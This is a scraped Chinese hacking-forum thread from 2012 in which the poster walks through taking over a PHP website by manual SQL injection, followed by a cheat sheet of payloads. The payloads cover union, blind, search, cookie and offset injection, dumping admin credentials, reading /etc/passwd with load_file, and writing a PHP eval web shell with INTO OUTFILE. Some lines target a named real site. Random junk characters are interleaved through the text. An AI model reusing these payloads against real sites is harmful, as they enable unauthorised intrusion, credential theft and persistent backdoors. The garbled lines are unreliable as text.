找回密码
 立即注册
查看: 4020|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~; J" m8 g4 w* O. {) a% [$ a
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
) k  {# l% K" T( z5 M我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
' @( j& x/ m# P; H6 O如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
0 {8 N- h/ E  W1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)1 k5 O3 ?5 p5 D, @5 L- B% X
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
' C- k6 \& W8 v  E* Y9 u* z4 `, AWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in; g# f' p& @  h
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入" C+ ^+ G- q, G' c: A* u- D
                        
/ h7 z+ B! J8 p% u2 u2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,( b4 z# m" J  m1 R" x
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意. S: g7 x3 N* N
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
. K( Q& f8 [! w1 ^5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
5 h# V1 k" ~, x+ Z2 }4 n; a3 F" z有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
/ ^# g9 f# `4 Z. ?: N2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。1 g0 }  P2 }! t. C
我就用的是第二个思路,
% A+ N! Q% |! W8 P. q5 k# p提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  2 s, v+ C* S; S( i
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
1 ?  I, i. N) p提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--, Y4 Q  b1 {  E1 k" O# i
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
- K2 v8 I" o: S3 f5 Y, O7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
2 s. e/ A8 c: z* N. `是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
6 F% J  H+ U7 @' w8 C提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
5 ~: |4 M# l8 W- |) b) i- n然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,. e. [$ I* L$ l+ G* x
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
" I4 w  G' W, K" P下面是一些很普遍注入方式资料:3 H8 r& l  s; @: V( P) s9 }3 Q
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='" K) n8 ^5 E. R9 N
拆半法5 q: c$ f0 `6 i( a' u* A
######################################
1 ~8 X% H" u* Zand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。9 O6 D! @4 b+ t. ]# z, k
and exists (select * from admin)
! W* h5 U' j! e& i2 A: x5 Y. Vand exists(select id from admin)
0 ~6 N0 p3 `: C- hand exists(select id from admin where id=1)
' N6 u9 {( [: Yand exists(select id from admin where id>1)
% s9 j) @2 L( ~* D  U' A6 l然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 $ ]3 v' n& G4 N6 n% U# k
and exists (select username from admin)
1 G8 o7 P  j0 `" }/ Z, h/ land exists (select password from admin)0 M. |. T6 v3 C
and exists (select id from admin where len(username)<10 and id=1)
3 J' X& |# X8 S! t5 m5 zand exists (select id from admin where len(username)>5 and id=1)
9 X9 o' a  G( g* }and exists (select id from admin where len(username)=6 and id=1)
8 v/ ]  o; i/ o2 i2 x, a- Nand exists (select id from admin where len(password)<10 and id=1)1 y5 r+ N3 [$ u5 l' V
and exists (select id from admin where len(password)>5 and id=1)
5 R+ \: e# U4 e# [, w' ]and exists (select id from admin where len(password)=7 and id=1)
$ t  h5 e1 V2 M! q) p' N; y0 Land (select top 1 asc(mid(username,1,1)) from admin)=97
! a' T, Z8 C; C& |返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
: ~9 Y# l2 K! P. v! N- F猜第二位把username,1,1改成username,2,1就可以了。' {, r9 M6 `6 `- x2 B( \
猜密码把username改成password就OK了
7 I- j) S: M( c$ B6 E##################################################+ {& g: C4 r" _" g$ Y1 Y. R# u
搜索型注入1 X# Q/ q- Q# h8 @. y% |2 X7 l& ]
##################################
' `& ^0 n8 U0 r%' and 1=1 and '%'=', R9 C% U- x2 \
%' and exists (select * from admin) and '%'='+ k, V3 f/ Y$ X2 l4 b" K4 V
%' and exists(select id from admin where id=1) and '%'='! B2 V3 J# F7 x' n+ }6 D2 _
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='* g0 \1 U, B7 F: G/ }; g
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='9 t4 B; E: d  P, c+ {8 ]4 F& }
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'=') `% u. i  _0 H- W5 e: R2 t
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
  U. G7 a4 J  @3 r$ z: l7 b" o对于MSSQL数据库,后面可以吧 and '%'='换成--
* F9 V# L( t9 ~6 W. P& E还有一点搜索型注入也可以使用union语句。* E2 X% a# e: i. a/ S+ i
########################################################1 v3 p. L: V5 }+ |. v/ _
联合查询。
+ k& u7 h2 k; M6 _+ n#####################################5 G  D; d. v2 L+ ?3 }  W
order by 10
" w- K% o, A8 z$ y3 \' t+ B3 cand 1=2 union select 1,2,3,4,5,6,7,8,9,106 S& F  L4 O9 ~. B0 g1 C$ n
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
7 ~; V0 X3 u* |5 V' m$ ^/ yand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
4 i% G5 C/ O/ w3 l, E很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)7 r' p& K' Q0 I1 ], j4 Q
###################################
1 J6 O' Q/ X, l9 b  Vcookie注入$ s! I0 j  _. H  L* U- T% Q
###############################
9 e) J6 |5 `" L) @( t  W2 Q, Dhttp://www.******.com/shownews.asp?id=127
6 [; l/ d& s" X- D, xhttp://www.******.com/shownews.asp
9 Z7 e; o1 r2 ^5 C  J1 valert(="id="+escape("127"));1 H+ z, {' B0 G% o% \
alert(="id="+escape("127 and 1=1"));
% O- @  M/ J: Palert(="id="+escape("127 order by 10"));
1 J$ Y5 D; o2 A, E' U% D& u  Aalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));$ Y' F+ K5 `0 H( ?& C; }
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
/ M4 P: i3 o0 {* U这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
# S4 D) q. L: v: H* h###################################% N0 C# p9 d- z) I0 G8 ?
偏移注入
: c  P( j2 V3 |, v+ z3 I6 T7 \###########################################################
% S, t. D8 l5 p8 f8 yunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
( A# Z% s6 f. E6 i' L$ N$ k$ B2 Uunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin- u' l0 |% V9 }1 Z) a
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
" S3 e/ m% v+ C6 \union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)5 j0 `* }9 h: m6 N6 r
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)2 H. n- I0 r* Z2 e* g+ A
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)- `5 b% L) ~4 W* `- g2 t
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
" Z# \* o' x7 ]a.id=d.id)
. w1 [, b; f' yand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)0 L4 w- k1 U! P0 {" T, X
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 8 A; q4 R) d. n, e( W( ~7 q
  
+ L; l/ _' g1 _- d: r! Q============================================================================================================
; u2 C7 t" c/ M% }1.判断版本1 d3 u( D" d. f1 P+ H
and ord(mid(version(),1,1))>512 ~+ I2 S1 X# q* e5 I  t
返回正常,说明大于4.0版本,支持ounion查询8 t  O  I% s. s1 M
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
1 u9 [# ~: w- O+ k5 t$ F4 [and 2=4 union select 1,2,3,4,5,6,7,8,9--
' i0 Y+ L4 K, @2 S9 N3.查看数据库版本及当前用户,
2 Y5 ^0 K: _8 t2 W0 xand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
9 Y% @4 G+ U8 j: \0 o数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
0 V" ~3 c+ s& e" `. `; {4.判断有没有写权限! G6 S! [  T8 h' Z# W$ h+ p( S! Q3 ?
and (select count(*) from MySQL.user)>0--
; [/ Q8 H  u' p, q7 ?& c3 e5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
5 H4 ?* |  @) z用不了这个命令,就学习土耳其黑客手法,如下0 u& k& @$ v1 K& k$ ^
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--  Q) a2 V; |+ A. s( |
6.爆表,爆库
. `% p" U; F; |$ H6 Z0 zand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
5 ~5 J: c, x1 ^+ _7.爆列名,爆表
& W: p% \- c2 a5 Yand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
: d" F# l9 I4 b0 J) O$ K; F8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
& J3 i3 Q$ z4 ?and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
- L+ a$ I; U( H$ `7 ~) @9.爆字段内容
8 _- a$ E  l+ L8 ~) jand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
7 [) [6 }  z' r* shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表